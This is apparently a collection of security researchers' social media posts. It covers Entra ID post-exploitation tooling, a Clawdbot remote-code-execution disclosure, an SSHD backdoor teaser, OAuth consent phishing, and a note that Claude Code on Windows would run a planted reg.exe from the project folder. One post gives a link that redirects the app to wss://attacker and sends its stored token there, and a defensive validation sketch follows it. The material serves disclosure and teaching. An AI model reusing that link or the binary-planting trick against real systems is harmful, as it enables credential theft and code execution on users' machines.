GraphSpy: A Hacker's Tooling Deep Dive, video demos with the creator @RedByte1337! 🤩 Keanu shows me the wild things you can do for post-exploitation in Entra ID -- even adding a physical security key for persistence and a ton of other tricks 🤯 Video: youtu.be/qEtoKC32UoE
funny nugget from the Payload Podcast with @JonnyJohnson_ today
looks like claude code 2.1.69 on Windows shells out to do a registry query for settings (both HKCU and HKLM)
so any reg.exe in your project folder would run right as claude starts up
when will cc be a lolbin 😝
The recent Trezor-physical-mail-phish-delivery-crypto-scam made me giggle -- so I rambled about it in a video. I'm not a crypto guy but alarm bells should probably go off in your mind when something is asking for your recovery seed phrase. 😅 Video: youtu.be/UQFySFs2GJk
🚨We found RCE in Clawdbot 🚨
If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.
The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian".
Here's how it went down 👇
We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load.
Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏
On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token!
Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇
ethiack.com/news/blog/one-…
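A defensive sketch of the flaw described in the thread above, as an added example that is not part of the original posts and is not Clawdbot's or Ethiack's code: it decides whether a `gatewayUrl` query parameter may be used and whether the saved token may accompany it. The function name, the return shape, and the sample address, port and token are assumptions constructed for illustration.

```javascript
// Added example with hypothetical names; not Clawdbot's actual code.
// saved = { url, token } as the UI would load them from localStorage.
function resolveGateway(pageUrl, saved) {
  const requested = new URL(pageUrl).searchParams.get("gatewayUrl");

  // No override in the link: use the saved gateway and its token.
  if (requested === null) {
    return { action: "connect", url: saved.url, token: saved.token };
  }

  let target;
  try {
    target = new URL(requested);
  } catch {
    return { action: "reject", url: null, token: null };
  }

  // Only WebSocket schemes are valid gateway addresses.
  if (target.protocol !== "ws:" && target.protocol !== "wss:") {
    return { action: "reject", url: null, token: null };
  }

  // The token was issued for the saved gateway, so it may only travel to
  // the same scheme, host and port. Comparing parsed fields (not string
  // prefixes) also defeats user-info tricks such as ws://good@other-host/.
  const home = new URL(saved.url);
  if (target.protocol === home.protocol && target.host === home.host) {
    return { action: "connect", url: target.href, token: saved.token };
  }

  // Different gateway: never auto-connect and never attach the saved token.
  // The UI should show the target and ask the user to confirm first.
  return { action: "confirm", url: target.href, token: null };
}

// Constructed sample values (address, port and token are made up).
const SAVED = { url: "ws://127.0.0.1:18789", token: "constructed-token" };
const PAGE = "http://127.0.0.1:18789/chat";
```

With this policy a link carrying a foreign `gatewayUrl` yields `action: "confirm"` with `token: null`, so the first connect frame cannot be built from the stored token without user involvement.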
This is one very tasty offer to be had over on learn.justhacking.com: "Use Code CYBER25 For 25% Off Courses! Ends Mid ET Dec 31" 😀.
I used it on this beauty of a course, "Windows Log Analysis - SIEMless Threat Hunting" 😀, one of many amazing courses available. The course looks
🚨 DAY 16 IS LIVE 🚨
Welcome to Registry Forensics.
McSkidy is still missing.
dispatch-srv01 didn’t just break...it was touched.
And the Windows Registry?
Yeah… it remembers everything.
No guessing. No vibes. Just cold, forensic truth.
🕵️‍♀️ The clock’s ticking. The evidence is waiting.
👉 Start Day 16 now: tryhackme.com/adventofcyber2…
THC Release: 🎄Smallest SSHD backdoor🎄
- Does not add any new file
- Survives apt-update
- Does not use PAM or authorized_keys
Just SSHD trickery....adds one line only.
More at thc.org/tips 👌
"'ConsentFix', a browser-based ClickFix-style attack with OAuth consent grants" ... leveraging the Azure CLI app client to social engineer for easy access into Entra ID 👀 I got nerdsniped by this, so I played with it a bit and tried a drag-and-drop gesture! Video: youtu.be/AAiiIY-Soak